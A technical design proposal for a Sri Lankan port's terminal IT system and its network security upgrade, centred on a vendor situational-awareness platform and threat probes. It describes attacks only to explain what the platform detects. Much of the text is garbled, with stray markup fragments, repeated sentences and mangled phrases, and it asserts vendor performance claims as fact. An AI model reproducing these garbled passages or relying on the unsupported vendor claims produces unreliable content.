basic design concept

Project Overview

Construction objectives, construction content and construction period

The construction objectives of this project are: the construction of CTOS system-related servers, terminals, networks and supporting security equipment, etc., to improve the operational efficiency of Sri Lanka terminals through informatization, strengthen the information security monitoring and early-warning capacity of Sri Lanka terminal units, mainly to solve the current information security monitoring and early-warning capacity of Sri Lanka terminals' networks is weak, a single source of data and other issues, and further improve the network security monitoring and early-warning capacity of Sri Lanka terminals. The main purpose of this project is to solve the problems of weak information security monitoring and early warning capability of the Sri Lankan terminal network, further improve the monitoring and early warning capability of network emergencies, and realize the closed-loop management of monitoring, early warning, notification, rectification, feedback and analysis of the overall network security risks.

Through the deployment of monitoring management platform, network security monitoring probes, etc., to achieve effective discovery of unknown threat attacks, to achieve the effect of upgrading from local security to global security, from single-point warning to collaborative warning, and from fuzzy management to quantitative management.

The main construction elements of this project are:

CTOS server construction;

CTOS system supporting terminal construction;

Security awareness platform, WAF firewall, load balancing construction;

CTOS supporting network construction;

Delivery time: 30 natural days from the date of entry into force of the contract;

On-site implementation duration: After the arrival of the subject goods 45natural days, complete the deployment and implementation of the system in accordance with the implementation requirements of the procurement requirements;

demand analysis

server equipment

2servers will be used for database servers,Oracledatabase and dataguardshould run on these servers as production databases and disaster recovery systems.

Windows Server 2019 English Standard Edition (set of 6 ) and Red Hat Enterprise Linux OEM (2). dl-uid="7">sets)are required for the server.

2Set of access switches(48aGE RJ45, 4. uid="8">aSFP + ports) with to act as a serverconnection.

AvailabilityAll hardware and software products provided must be mature and widely available and remain state-of-the-art. The system shall consist of mature products and technologies that are not in the nature of a pilot system, and these products and technologies shall have users with successful applications. The system shall be state-of-the-art and robust for this phase and be provided with an application assurance license for five or more years.

OpennessThe system's design specifications, technical specifications, and products are all in line with the international and industry standards for open systems, and it has the ability to support a wide range of products. All products used in the system must comply with relevant international and national standards, and it is an open and compatible system that can be interconnected between different systems.

High EfficiencyThe server must have strong real-time processing capabilities to meet the needs of the bidding terminal's production applications and should be able to provide fast response and high throughput for end-users' business transactions in a relatively idle state or during peak traffic.

ScalabilityBidding servers and storage systems need to be more than twice as vertically and horizontally scalable to support system upgrades while protecting the cost of the original investment.

High reliabilityIndividual devices must be highly reliable. If there is a single point of failure in the core equipment, it should be switched to the disaster environment in a timely manner. The entire system must be highly fault-tolerant and must have a detailed redundant backup program.

IntegrityContractors must ensure the integrity of the system design, that the hardware and software versions of the system are fully compatible, and that each part (component) of the system ensures the normal and stable operation of the entire system.

StabilityNatureThe system design should identify the necessary protective measures and present the relevant site and environmental requirements to ensure that in the event of a power outage or momentary power loss, the hardware and software performance will not be affected in any way. The hardware should be protected against overload, voltage rise and current increase, and the hardware should have a certain carrying capacity for any non-control operation.

The system must provide fault monitoring and diagnostic tools for both hardware devices and system software.

wireless device

In order to realize the information management operation of on-site loading and unloading of container terminals, so that quay cranes, tire gantry cranes,ITV, on-site handheld terminals and other wireless devices can access the employer's backbone through the public LTE network system.

Holding terminals and other auxiliary equipment.

Carrier terminals and other auxiliary equipment.

This project requires the contractor to provide ancillary software such as device drivers and software.

The contractor is responsible for completing the design, integration, and installation,

Debugging, system tuning, security control, interconnection with wired network, connection with production system and application testing, performance tuning, full acceptance check until the system is in normal production operation.

Development of various technical training programs and provision of comprehensive training Development of various technical training programs and provision of comprehensive training

Installation, operation, management, and maintenance of wireless terminal equipment.

Throughout the course of the project, the contractor must provide

Various technical documents in English conforming to Sri Lankan national standards and internationally recognized standards

Procurement, construction, delivery, assembly, installation, testing, commissioning, system tuning and handover of the following:

(a) 15SetHand-held terminal

(b) 5SetsHHTMulti-Charger

(c) 26SetRTG/RMGTerminal

(d) 35SetVMTTerminal

HIPG Cybersecurity Construction

Establishing a comprehensive port network security system, improving network availability, protection and emergency response capabilities, and ensuring the safe and stable operation of port information systems. At present, HIPG has 2 core switches: one One is located in the Administration Building (primary data center) and the other is located in the Engineering Operation Building (backup data center), adopting a star network architecture with dual switches. The core switch of the backup data center is connected to the core switch of the administration building in Layer 3 routing mode. The core switches in the backup data center are mainly used for office network access in the Work Building, Marline Building and Shop Building. The core switches in the administration building are primarily used for servers and office network access in the administration building. The two core switches are connected to different systems through VLANs . There are 2 firewalls connected to the core switch in the administration building, and 2 firewalls connected to the core switch. uid="13"> a dedicated line to the Internet.

With the development of the network, the Internet has gradually become indispensable in people's livesan important reliance, but the problem of information security is also higher. uid="3">but the problem of information securityisalsogrowing more and more criticalwith it. uid="7">. In recent years,information securityproblems have become increasingly serious. span>has become a hotspot for industry attention and discussion. Currently,Traditional cybersecurity threats such as Trojan Horses, Botnets, and Phishing sites continue unabated. Distributed Denial of Service (DDOS attacks), Advanced Persistent Threats (APT attacks) and other new types of cyberattacks are intensifying.

In the face of today's more and more serious security situation, the traditional security system is also facing a huge challenges. Data shows that more than 100,000 organizations have suffered data breaches, with nearly half of the Fortune 500 included, as security incidents have impacted numerous executives who have resigned from their companies. This is due to APT advanced persistent attacks caused by APT attacks with its unique attack methods and means, making the traditional security defense tools have been insufficient for effective defense. APT attacks are not a whole, but the integration of many invasion and penetration techniques to achieve the stealthy attack techniques, can be gradually completed over a long period of time to break through, penetration, eavesdropping, stealing data and other tasks. ,which embodies the characteristics of two aspects - "targeted" and "persistence".

The main target industries for APT attacksaregovernments,< span data-dl-uid="4">military,financial institutions, telecommunicationand other industries,The main wayis through email, social networking sites, system vulnerabilities, viruses, etc.A range of ways to invadeuser computers. Enterprises can't defend against APT attacks,mostly because they can't detect APTattackshow and by what means,becauseAPT attack is an unknown threat, it is impossible to determine its attackroute and channel, it has strong stealth and persistence,it can lurk in computers for a long timewithout being detected.

Not counting the process of preliminary reconnaissance and information acquisition, it takes an attacker only a few hours from the time of execution to the time of compromise, compared to more than 84 percent ofunits It takes weeks or even more than a month to discover a hacker attack, followed by days to weeks to complete the response and dispositionwork.

Traditional defenses rely on firewall technology,intrusion detection technologyantivirus technology,Any user, at the very beginning of the face of the security problem, to consider often is this three, the traditional defense defenseis this three. span>Althoughit has played a great role, it stillfacesmany new problems.

First of all, the user's system, although the deployment of firewalls, but still can not avoid the worm flood, spam, viruses, and denial of service infestation. There are inherent shortcomings in the early warning of individual products for intrusion detection that have not been deployed on a large scale, and there is still a lot of room for precise targeting and global management.

Secondly, although many users have installed antivirus products on standalone computers and terminals, the security of the intranet is not only a matter of antivirus, but also includes the implementation of security policies, foreign internet security. Anti-virus products are installed on individual computers and endpoints, but intranet security is not just about anti-virus, it also includes enforcement of security policies, external intrusion, patch management, and compliance management.

So, although the traditional defensestill plays an important role, users have gradually felt its inadequacybecauseit is no longer able todetect and defend againstnew types of attacks. Simply put, cyberattack technology has outpaced the defense techniques used by most organizations today.

Construction program

DesignPrinciples

The entire system should utilize the most mature and advanced technologies from various industries, such as IT network management, container operation management, shipping and logistics management. Vessel traffic management, etc. These systems must be recognized as industry-leading products.

Efficiency: Ensures uninterrupted high operational performance of containerized operations under high loads 24/7/365.

High reliability: Redundant components and functions should be designed for the entire system and must be very comprehensive and complete.

High security: As Internet-based open system technology and distributed information technology have greater flexibility and scalability, information security has become one of the important factors that cannot be ignored. There must be a strict and effective security mechanism to control and manage the system. How to ensure the stability and reliability of the system, maintain network security, and prevent hacker attacks and computer virus invasion is an integral part of system security that cannot be ignored.

Manageability and Maintainability: In a complex network and system environment, a high degree of manageability has become the key to system success. The system is designed with full consideration of using advanced system management software for daily monitoring, backup, setting thresholds and handling controllable events to ensure the reliability of the management system.

Scalability: In the rapidly developing information field, the application environment, hardware and software will be constantly updated, and the equipment system needs to fully consider the protection of current end-use investment. The development of the enterprise depends on the scalability, consistency and compatibility of the system.

Construction content

Hardware and software for production servers and other related accessory equipment

EquipmentDrivers, software and other related programs

Provide complete system design documents, installation screen records and configuration manuals, etc., as required by the technical specifications.

Responsible for site investigation, analysis, design, equipment procurement, installation, system commissioning, rollout, technical support and services for the entire system and ensuring network connectivity.

Prepare a technical training program and provide comprehensive training on the installation, operation, management and maintenance of the entire system.

Free 3-year warranty on all servers and 1-year warranty on all other equipment.

Security Sensing System

Improving network partitioning will require us to migrate the production network from the core switches in the administration building to two additional core switches that are dedicated to the production network. In addition, we will use two newly added firewalls to segregate the production network from the office network and provide four production network access switches.

The additional core switches, access switches and firewalls will be deployed in high availability mode.

Add two WAF (Web < span data-dl-uid="4">Application Firewall) appliance for enhanced protection of internal Web applications. High Availability Mode Deployment.

Add two load balancing devices to the production network to improve high availability of business systems. High-availability mode deployment.

Create a new security operations and maintenance zone (VLAN) on the core switch in the primary data center. Two Privileged Access Management (bastion hosts) are deployed in the Security Operations and Maintenance area to manage and maintain applications, databases, servers, and network devices, and to provide operation log auditing. High availability mode deployment.

A situational awareness platform is deployed in the security operations and maintenance area to monitor border traffic between the Internet and the production network. The platform visualizes the state of network security so that threats can be quickly detected and responded to in a timely manner.

Deploy enterprise antivirus software suite in secure operations and maintenance areas.

system architecture

Through the latent threat probes, the whole network security perception visualization platform, security services cloud platform constitutes the technical architecture of continuous detection and rapid response:

Figure 4-1 System Architecture of Security Awareness Platform

Subliminal Threat Agent (STA): Deploys Subliminal Threat Agent (STA) at the core switching layer and the internal security domain to internally identify user access to business assets, business relationships based on captured access to business assets and business. relationships are identified, and preliminary attacks are identified internally based on capturednetwork traffic, violation detection and intranet anomalous behavior identification. Probes are deployed in bypass mode, which is simple to implement and does not affect the original network structure at all, reducing the incidence of single-point network failure. At this time, the probe obtains a "copy" of the data in the link, which is mainly used to listen to and detect the data flow in the LAN and the network behavior of users or servers, as well as to realize the collection of TCP behavior of users or servers.

Security-awarenessPlatform (SIP): Deploying security-awarenessplatforms on the intranetWhole-networkinspection system to collect data from security detection probes at each node and present users with a visual representation of intranet business assets and critical business assets for the intranet. The detection system collects data from security detection probes at each node and presents users with intranet business assets and attacks and potentialattacks against intranet-critical business assets through visualization. data-dl-uid="6">threats; and unified management and policy issuance of all security systems on the existing network through this platform.

Component Implementation

The network-wide security awareness platform is mainly composed of two parts: threat latent probes, security awareness system, and supports seamless connection with other security devices, and provides in-depth analysis, threat correlation and service response capabilities based on the security service cloud. "3">, while supporting seamless interfacing with other security devices and providing in-depth analysis, threat correlation and service response capabilities based on the Security Service Cloud. Built on a 64-bit, multi-core, concurrent, high-speed hardware platform, Threat Probe uses a self-developed parallel operating system (Sangfor OS) to parallelize the forwarding plane and the security plane on a multi-core platform OS. span>, multiplanar concurrent processing, close collaboration, greatly improve the performance of network packet security processing the performance of secure processing of network packets. The security awareness system utilizes big dataparallel computing frameworks to support correlation analysis, traffic detection, machine learning, and other computational detection modules, thus realizing a full range of detection services in collaboration with massive data analysis.

latent threat probe

separation planar design

Threat Lurking Probe separates the data processing of network layer and application layer by software design, based on application recognition module in the bottom layer, it recognizes all the data received by NICs, and then grabs the application data messages that need to be processed to the application layer by packet grabbing driver. If data processing failure occurs in the application layer, it will not affect the forwarding of data in the network layer, thus realizing efficient and reliable data message processing.

multicore parallel processing

The design of Threat Lurking Probe not only adopts multi-core hardware architecture, but also adopts advanced lock-free parallel processing technology in the design of computational instructions, which can realize multi-pipeline simultaneous processing, exponentially increase the system throughput, and the performance is very excellent under multi-core system, which is a real multi-core parallel processing architecture.

single resolution architecture (SRA)

Threat Lurking Probe adopts single-parsing architecture to realize one-parsing and one-matching of messages, which effectively improves the efficiency of the application layer. One of the key elements to realize the single parsing technology is the software architecture design to realize the separation of the network layer, application layer plane, the data will be extracted to the application plane through the "0" copy technology to realize the unified parsing of the threat characteristics and unified detection, to reduce redundant packet encapsulation, and to achieve high-performance data processing.

jump scan technology

Threat Lurking Probe utilizes the application identification technology accumulated over the years to tag all packets passing through the probe with an application through a private protocol at the kernel driver level. When the packets are extracted to the content inspection plane for inspection, the device will find the corresponding application threat features. By using jump scanning technology to skip irrelevant application threat detection features, it reduces ineffective scanning and improves scanning efficiency. For example, if the traffic is recognized as HTTP traffic, then the relevant vulnerability attack features of FTP server-u will not pose a threat to the system, and the detection can be temporarily skipped for forwarding to improve the efficiency of forwarding.

Flow Records

Able to restore and record network communication behavior for security personnel to conduct forensic analysis, restore content includes: TCP session records, Web access records, SQL access records, DNS resolution records, file transfer behavior, LDAP login behavior.

message detection engine

It can realize IP fragmentation reorganization, TCP stream reorganization, application layer protocol identification and parsing, etc. It has various intrusion attack modes or malicious URL monitoring modes, can complete pattern matching and generate events, can extract URL records and domain name records, and can record original messages based on quintuple and binary (IP pairs) when triggered by characteristic events.

Sangfor Regex Regular Engine

Regular expressions are a method of recognizing specific patterns of data that can accurately identify attacks in a network. It has been found by security experts that the speed of regular expression matching methods already available in the industry is generally slow, which restricts the improvement of the whole speed of the probes. To this end, a new Sangfor Regex regular engine has been designed and implemented, which raises the regular expression matching speed to dozens of Gbps, tens of times faster than the well-known engines such as PCRE and Google's RE2, reaching the industry's leading level. tens of times faster than well-known engines such as PCRE and Google RE2, reaching an industry-leading level. .

Threat Latent Probe'sSangfor Regex drastically reduces CPU utilization and effectively improves Threat Latent Probe's throughput, enabling higher speed processing of customer business data. This technology is especially suitable for scenarios with particularly high throughput per second requirements, such as carriers and e-commerce companies. .

Security Awareness Platform

Asset operations management

According to functional division, intranet devices can be categorized into assets and services. The security awareness platform can actively identify intranet assets and actively discover IP addresses of undefined equipment assets in the intranet, eliminating the need for users to perform tedious statistics and entry and saving them time. Asset configuration details display module, can identify the IP address of the intranet server assets, operating system, open ports, as well as the transmission of the use of protocols and applications. Business-asset relationship display module, which can be combined into specific business groups by asset IP address/address segment.

Intranet Traffic Display

Access relationship display module, through the access relationship learning to display the access relationship between users, business systems, Internet, can identify the who, what, when, how of the access relationship, through the color to distinguish between different danger level users, business systems. Graphical display of intranet access violations, attacks, and abnormal traffic, displaying normal access, access violations, attacks, and abnormal traffic of the intranet for different business assets and distinguishing them with different colors, which is more intuitive for users to access.

Monitoring the identification knowledge base

The built-in detection and identification knowledge base of the security awareness platform covers more than 1,100 types of applications, with a total of more than 3,000 application identification rules, and has the ability to identify URLs at the level of hundreds of millions of dollars; the knowledge base covers more than 4,000 intrusion protection vulnerability rules and features, and the intrusion protection vulnerability features have a Chinese language introduction, including, but not limited to, the vulnerability description, vulnerability name, danger level, and the affected system, Corresponding CVE number, reference information and suggested solutions; the knowledge base has an independent bot host identification feature library, and the total number of malware identification features is more than 500,000 items.

Log collection and correlation

Security Awareness Platform can collect and analyze logs and alarms related to Next Generation Firewall (NGAF) and Endpoint Security System (EDR), and conduct corresponding analysis and correlation, and at the same time, for the security hazards found by the platform's analysis, it can also quickly At the same time, for the security risks found by the platform analysis, it can also quickly call these protection systems to block and kill the security risks and attack codes in response.

For third-party security devices that support syslog, the platform also supports the collection, storage and query services of related logs.

Visualization Platform

The network-wide attack monitoring and visualization platform supports security situational awareness, map presentation and visualization of network-wide security events and attacks. Statistics and display by attack event, attack source, attack target, attack type, and hazard level. The visualization platform supports network-wide business visualization, which can present the graphical display of the access relationship of the network-wide business objects and the invaded business. It supports user-defined visualization of business asset management. Support for analyzing the traffic passing through the device and discovering the vulnerabilities of the protected object (non-mainactive scanning). Business external connection monitoring large screen, displaying real-time dynamic map of assets and business attacked by external network, graphical large screen display. Branch security monitoring, capable of displaying the security status of branches/supervised organizations in the form of map topology, ranking the risk status and listing the security trends of branches/supervised organizations. Security log display supports the summary of security logs of all security devices, and can filter logs by multiple conditions such as time, type, severity level, action, region,IP, user, feature/vulnerability ID, reply status code, domain name/URL, device name, and other multiple conditions to query the filtered logs.

Big Data Analytics Engine

Big Data Analysis Engine is responsible for realizing all kinds of detection capabilities and big data correlation analysis capabilities. The engine consists of data preprocessing, data fusion, model construction, model fusion, analysis results generation and other major modules, with MapReduce as the underlying computing framework, MLibandTensorTensor as the underlying computing framework. span data-dl-uid="3">Tensorflow as the main machine learning frameworks, implementing SVM, Bayesian Networks, Random Forests, LDA, DGA, Markov Clustering, iForest, RNN, and other key machine learning algorithms to support security capabilities such as UEBA, failed host detection, and big data correlation analysis.

management function

The management function consists of several modules. The login module supports user identity security authentication mode, multiple login failures will lock the account within 5 minutes not to log in, support for the user to log in for the first time to force the password change function; upgrade module supports online upgrade and offline upgrade of two upgrade modes, and supports the automatic upgrade of the platform to unify the control of the probe upgrade; the user management module supports the addition of new users and management of the user, you can control user access rights, permissions include read time management module supports time synchronization, support for NTP V4.0 protocol; network management module provides network management functions, static routing configuration; device management module real-time monitoring of the device's CPU, memory, storage space usage, the ability to monitor the real-time traffic of the listening interface; data management module can analyze the number of files restored within a day or a week and the size and distribution of the traffic of each application. The data management module can analyze the statistics of the number of file restoration and the size and distribution of the traffic of each application in a day or a week.

Program Functional Design

From the perspective of network security construction, network traffic in the past can be said to be either black or white, black is risky traffic, white is safe traffic, and the black and white list filtering of firewall-type border protection equipment together with feature-based methods can intercept most threats. However, with the increasing number of Internet access devices, the increasing complexity of the network structure, the network environment has seen more and more exploitable weaknesses, hacker attacks are constantly improving and mutating, forming a gray area between black and white, and the scale is still expanding.

Traditional methods have struggled to effectively detect potential risks in the gray area,for whichwe adopted a key technology to deal with unknown threats, through which hacker invasion traces can be found faster and more accurately, so as to kill the hacker's attack plan in the cradle. Designed for the realization of the characteristics of hacker attacks, integrated consideration of each link of the hacker attack chain, is the key ability to guard the intranet security posture and guarantee the indispensable security of the enterprise network in today's constantly upgrading hacker attack methods.

Big Data Platform Processing Architecture

The platform adopts a hierarchical big data processing structure design, forming a complete processing logic process from data collection to final data analysis and presentation. The layers are divided as follows:

data acquisition layer

Collection includes terminal data, traffic collection, middleware data, third-party device logs, and threat intelligence docking. The layer provides a variety of interfaces for traffic and log data collection and docking, supporting syslog,webservie, restful api. "3">api, wmi, and other methods of collection.

Data preprocessing layer

Pre-processing of the collected data, including data cleansing, data merging, data enrichment, and ultimately data conversion into formatted data understandable by the platform, in the form of a file, waiting for analysis.

Big Data Analytics Layer

Read preprocessed data for offline calculation, or read ES (Eleastic Search) data for real-time calculation. Here the detection, analysis and statistics of the whole network security data, and combined with threat intelligence, behavioral analysis, intelligent analysis and other technologies, to discover the status quo of security threats, and at the same time, the built-in multiple security correlation rules can be the data for the consolidation of the alarm.

data storage layer

Analysis data and results are stored in the ES engine (Eleastic Search), which provides fast retrieval capabilities. At the same time, for the recent statistics that need to be presented quickly, the data is stored in MongoDB and can be read quickly without rendering and memory consumption compared to the ES engine.

data service layer

Based on the APP way to design the whole data visualization display, based on the interface to get data from the data storage layer, read the display data, provide various data security visualization services and external interface services.

Visualization usesext as the JS framework, based onECharts< as a graphic library, and vue architecture as a big screen visualization rendering support.

Big Data Analytics Support:Referring to hadoopcomputing frameworks, it uses the Hadoop MapReduce parallel computing framework for parallel processing, with reliability and fault tolerance, while providing support for large-scale cluster deployment and analysis of massive data sets. The use of ElasticSearchstructural engine (a common engine for big data analytics) provides fast retrieval capabilities for the underlying metadata, analytic data, and analysis results.

High-performance processing capabilities: Based on the above framework features, high-performance analysis capabilities can be obtained. At the same time based on the server hardware equipment as the basic running equipment, with high-performance analysis capabilities, to achieve daily billion real-time log analysis, about 3TB or so of data, while supporting billion logs second query. Performance Requirements Indicators:Stand-alone support for 20,000+ EPSDataInto the libraryData, standalone support for 100000+eps data analysis,32GSupport 100billiondata querying in second with memory.

Compute and storage scalability: Based on hadoopcomputing frameworks, it can Support for database-based cluster deployment mode, horizontal cluster expansion greatly improves the storage space and analysis performance of the big data platform. The following features are required: support for 64 analytic platforms for horizontal cluster expansion, support for 32 analytic platforms for vertical hierarchical cascading, automatic data balancing, distributed storage, optional multi-copy to improve data fault tolerance.

Asset identificationandVulnerability assessment

Asset Auto-Discovery: Adaptive identification of terminals, servers, etc.Asset Auto-Discovery: Adaptive identification of terminals , Servers, etc., < span data-dl-uid="3">.

Server Information Recognition: Automatic identification of server asset information, such as operating system, open ports, etc. It can be used to discover shadow assets, or with regular patrols, which can avoid security problems caused by frequent business updates (e.g., omissions, missed allocations, etc.).

Risky ports/applications: Identify risky ports opened by server assets and how they are being used (e.g., standard ports running non-standard protocols), and identify illegal connections due to exposure of risky application access methods (e.g., RDP, SSH, databases), and identify specific applications even if they are non-standard ports.

Organizational structure hierarchical division: Multi-level dimensional division of branch units, etc., and can be divided into assets, custom set the attributes of the assets, easy to locate the assets and manage them. The configured organizational hierarchy is also combined with a network-wide security situational awareness display to show the overall security situation. 

Real-time Vulnerability Analysis: For application traffic passing through the device, the traffic is parsed for the corresponding application, and the parsed application data is matched with a real-time vulnerability analysis and identification library to discover possible vulnerabilities in the operating system, Web general-purpose software or frameworks, Web applications, protocols, and other vulnerabilities existing in the server. Meanwhile, it provides built-in and customized weak password libraries to analyze the weak passwords of user-specified servers, and analyze whether there is any risk of weak passwords on the servers.

Asset Operation Detection: Based on SNMP method, assets and devices are operated information and monitored, real-time display of CPU, memory, disk, upstream and downstream traffic and other information, and form historical records. It can be compared with historical records for administrators to analyze the abnormal situation of equipment resources.  

Multi-dimensional threat detection

Basic testing capabilities

The reason why hackers can invade enterprise intranet, sometimes not by virtue of how clever skills, on the contrary, the network security incident to review and summarize found that many hackers invade the enterprise intranet to the enterprise losses, by virtue of only some traditional, simple means. For the enterprise network security construction, detection technology by simple and complex, but for the detection of hacking, the basic detection capabilities are also critical. Basic detection capability refers to the ability to detect those traditional and common abnormal traffic, mainly including abnormal session detection, Web application security detection, sensitive data leakage detection.

Anomalous session detection can realize the analysis and detection of abnormal communication behavior of multi-scenario network including outreach behavior analysis, intermittent session connection, encrypted channel analysis, abnormal domain name analysis, upstream and downstream traffic analysis, etc., and Web application security detection for B/S architecture applications, the scope of application includes mainstream scripting languages such as ASP, PHP, JSP and so on. webshellbackdoor script uploaded, detection of SQL injection, XSS, system commands and other injections, CSRF attacks, malicious crawler attacks, file inclusion, directory traversal, information leakage attacks and other attacks on the Security protection for mainstream CMS such as dedecms, phpcms. span data-dl-uid="6">,phpwindand so on. The sensitive data leakage detection capability, on the other hand, filters and detects information based on file types and sensitive keywords by customizing the sensitive information.

Deep Inspection Capability

Hackers bypass the traditional protection measures, often the first choice to lurk and hide, such as viruses are hackers invade the intranet is one of the common tools, the virus program into the system is generally not immediately after the onset of the program, but in the weeks or months or even a few years hidden in the legitimate files, the infection of the other system and undetected, the majority of virus Most viruses work by accessing specific URLs via the HTTP protocol to obtain or submit information, and some viruses use DNS to look up the IP of a domain name and then establish a connection with that IP to interact with the data. For example, in order to communicate with the C&C server, the botnet will request DNS to obtain the IP of the corresponding C&C server, these URL addresses and domain names corresponding to the IP of the host is usually the key to provide interactive information for the virus, effectively identify these hosts can block the connection between the intranet virus and the outside world. These attacks are much more effective than traditional attacks. These attacks are more sophisticated and insidious than traditional attacks, and the deep detection capability is designed to detect this insidious malicious behavior.

The in-depth detection capability of the Security Awareness Platform provides a session-level view of network traffic, builds a normal traffic model based on the normal behavioral profile characteristics of network traffic, and determines whether the traffic is abnormal or not, and can detect network worms, network horizontal scanning, network vertical scanning, IP address scanning, port scanning, and ARP spoofing. Meanwhile, the in-depth detection capability also includes password brute-force breaking detection, weak password scanning detection, black chain detection, and terminal virus/malware detection. In response to the characteristics of zombie machines and virus programs that need to communicate with external C&C servers to achieve seizure, the unique DGA detection algorithm of the Security Awareness Platform that integrates Markov model and information entropy uses machine learning to identify whether a domain name is generated by an algorithm, and estimates the domain name reputation value based on the randomness, so as to detect the traffic related to malicious IP addresses.

UEBA and Access Anomaly Detection

In the enterprise network environment, when an employee is not on night shift, the employee's host access to the business server at 4:00 a.m. belongs to the access anomaly. In the past, user business access control and Web business access control mainly rely on rules to achieve, but due to the existence of large differences in individual behavioral patterns, while hacker attacks are increasingly inclined to disguise themselves as normal user behavior so as to avoid the access rules, so it is difficult to effectively deal with the access anomalies of the rule-based control strategy. Machine learning algorithms are able to model diverse user behavior patterns and Web access patterns to achieve better detection results.

The user business access anomaly detection of the security awareness platform is based on the user's historical behavior and the behavioral similarity between users, the similarity for statistical analysis, and the use of machine learning for modeling, so as to analyze the user and the host and other entities (UEBA), identify the user's anomalous access to the business system, and then discover the potential threats such as customer credentials being stolen and the user's host being compromised. Web business access anomaly detection uses Markov random process and Bayesian recursive estimation, combined with other machine learning algorithms to analyze and model the interactive behavior of Web business, so as to detect all kinds of attacks on Web business, such as data leakage, Web Shell, intranet data proxy forwarding and other high-risk behaviors.

Comprehensive testing before, during and after the event

Failed Host Detection

After hackers attack the intranet, they will place Trojans and backdoors on the compromised hosts, so as to achieve the purpose of controlling the hosts. After hackers control a large number of compromised hosts, they will also launch DDOS attacks on the target hosts, scanning and breaking and other malicious behaviors. Host failure is the first step for hackers to enter the intranet, and timely discovery of failed hosts will be able to stifle the further actions of hackers as early as possible, thus ensuring the security of the enterprise network environment.

Currently there are more than 20 known compromised host detection algorithms, such as rule-based and library-based algorithms. The built-in algorithm of the security awareness platform is able to analyze features such as virus behavior, abnormal outreach behavior, and common hacker attacks, etc. The algorithm integrates fast-flux identification,iForest , host network traffic model, protocol model learning, while combining the linkage analysis provided by the big data correlation analysis engine as well as the DGA domain name discrimination to build a fusion detection model, so as to discover the out-of-control hosts in a timely manner.

Horizontal Threat Awareness

For most customers,the core business system will be deployed a large number of security protection system and formulate a detailed management system to ensure that the non-public services will not have any problems. , non-public service systems are not even exposed to the attacker's directly accessible view. Therefore, it is often difficult for hackers and attackers to penetrate and attack these systems directly, and so the classic APT "attack infiltration - control springboard - lateral movement - control the target - theft and destruction" process, by attacking and controlling the weak defense of the internal non-core assets, to use it as a springboard for infiltration and attack.

Lateral Threat Detection locates monitoring and analysis in the logical analysis of the behavior of internal operations and assets,Real-time monitoring of inter-system access requests ,packet contentand business logic, including:

for feature-matching-based attack detection,i.e., scanning, traditional attacks such as infiltration

Violation detection based on whitelisting policies,Discovery of asset behavior deviating from predefined security policies

Behavioral anomaly detection based on UEBA technology, which identifies deviations in asset behavioral logic from its own security baseline or the security baseline validation of similar assets

Common risky remote login, database request behavior

Through the behavioral characteristics of these assets to determine whether they appear to be controlled by hackers and become internal attack springboards. As the process of attack penetration and control springboard is always based on 0Day and unknown threats in most cases, but the process of internal lateral movement is inevitably accompanied by access requests, packet content and behavioral logic abnormalities of controlled assets, which can be used as an effective means of detecting APT attacks, and by detecting and blocking attacks at the lateral movement stage, we can effectively prevent the core business from falling into disrepair and sensitive information from being compromised. Loss of confidentiality.

Outreach Threat Awareness

Many customers often complain that traditional network security devices and solutions focus only on functionality, and even professional security operations and maintenance personnel are difficult to understand the security status of the entire network in real time. Enterprises need not only a secure network environment, but also need to understand the security status of the network environment in a simple, intuitive way, such as for post-mortem detection, customers are concerned about the focus is on their core business servers have been lost, the customer's business systems whether there is a situation of external connectivity, with which countries and provinces outside the connection, the external access to the presence of what risks and postures, and how to solve and so on.

Inspection of outgoing traffic from a business server is an effective means of determining the security status of that server. Failed servers generally behave differently from when they are operating normally. By analyzing the behavior of the server's outgoing connections, a model of the server's normal operation is established, which is used as a benchmark for detecting abnormal operation of the server. The visualization platform visualizes the external connection of the customer's business system, allowing the customer to intuitively perceive the dynamics of the business system, forming a complete "external connection situation awareness, external connection situation understanding, external connection situation prediction " closed loop, in the interactive experience, almost zero operation and zero learning cost, combined with the large screen put, clear and intuitive to do"Security posture can be perceived, security value can be presented".

Successful Attack in the Middle of the Matter

Typical APT attack process, the attacker often does not stop at controlling the target host or system, but through the system as a medium to implement further attacks and penetration. Therefore, in the analysis and judgment process of security incidents, it is not only necessary to analyze the source and mode of the attack, so as to determine the current emergency response program and after the fact security reinforcement strategy, but also need to track and analyze the possible impact of the surface and means of attack, to ensure that this successful attack has not yet been a successful attack on the actual impact of other more assets, or if it has caused the impact of a further Identify hazards and initiate appropriate disposal processes.

External risk visits

For most units, attackers from the outside are still the main threat they face, so in-depth analysis and detection of data from untrustworthy/relatively uncontrollable networks such as the Internet or branch offices, correlating their direct access logic, access requests, and behavioral characteristics, directory traversal, ftp bursting, well-known vulnerability exploitation attacks wenshellfile uploading, and many other mainstream high-risk penetration attacks.

Intelligence correlation and intelligent analysis

Threat Intelligence Correlation

Today's network security offensive and defensive war has formed a situation where attackers are organized and premeditated, and defenders are detected and tactical. To safeguard the enterprise's own network security, not only do we need hardware and software infrastructure, but we also need to understand the routines and movements of the hacker attacks through threat intelligence, so that we can know ourselves and our enemies. Threat intelligence is a threat that already exists or is being revealed, through the evidence of knowledge (including context, mechanism, impact, etc.), to address the threat or harm and decision-making knowledge.

The Security Awareness Platform utilizes threat intelligence such as threat rules and advance risk assessments to match current events in order to identify and respond to threats. The intelligence system has the following capabilities:

Threat assessment of an incident based on the level of credibility of the incident participants;

In cases where the threat level generated by an event does not reach the alert level, the threat level is increased if the event matches the threat intelligence profile;

Filtering out most incidents of low threat behavior facilitates the analysis of potential threats;

Sharing mechanisms and synergies are utilized to ensure that attacks encountered after the first attack can be quickly identified and responded to;

Raising the cost of attacking for attackers, who need more sophisticated hiding methods to bypass this system of concerted defense;

Targeted threat intelligence can detect APT attacks;

Threat intelligence provides more dimensional information for analysis of security logs, events, etc. Threats lurking in normal traffic can be discovered through correlation analysis methods.

Big Data Correlation Analysis

Traditional network border security techniques tend to focus on preventing attacks from the Internet, mainly from public Web servers such as HTTP or SMTP attacks, and when the hacker bypasses the border protection to enter the intranet, generally will first take control of a Server inside the local network, and then use it as a base to launch vicious attacks on other hosts in the network. It is difficult to detect hacker invasion only by a single data source. To address this issue, big data correlation analysis can dig out the traces of hacker invasion behavior from multi-dimensional massive data to help users effectively detect unknown threats, thus enhancing network security capabilities.

